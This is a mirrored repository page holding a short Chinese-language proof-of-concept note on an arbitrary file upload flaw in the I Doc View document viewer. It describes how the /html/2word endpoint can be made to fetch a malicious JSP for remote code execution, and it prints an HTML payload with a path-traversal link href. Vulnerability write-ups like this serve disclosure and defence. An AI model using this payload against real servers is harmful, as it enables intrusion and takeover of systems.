admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/iDocView/I Doc View任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

896 B
Raw Blame History

I Doc View任意文件上传漏洞

I DOC VIEW是一个在线的文档查看器其中的/html/2word接口因为处理不当导致可以远程读取任意文件通过这个接口导致服务器下载恶意的JSP进行解析从而RCE。

POC构造

流程携带恶意link[href]的html -> 远程获取 -> 解析出href -> 远程获取恶意文件

poc.html


<!DOCTYPE html>
<html lang="en">
<head>
    <title>test</title>  
</head>
<body>
  <link href="/..\..\..\docview\poc.jsp">
</body>
</html>

然后构造 ..\..\..\docview\poc.jsp 这个是文件 image

image

漏洞分析

https://mp.weixin.qq.com/s/lDqhDnZGXoRyp2IolQ2odg
https://mp.weixin.qq.com/s/mD4EcVmJ9QPmmMLh6KrZ0g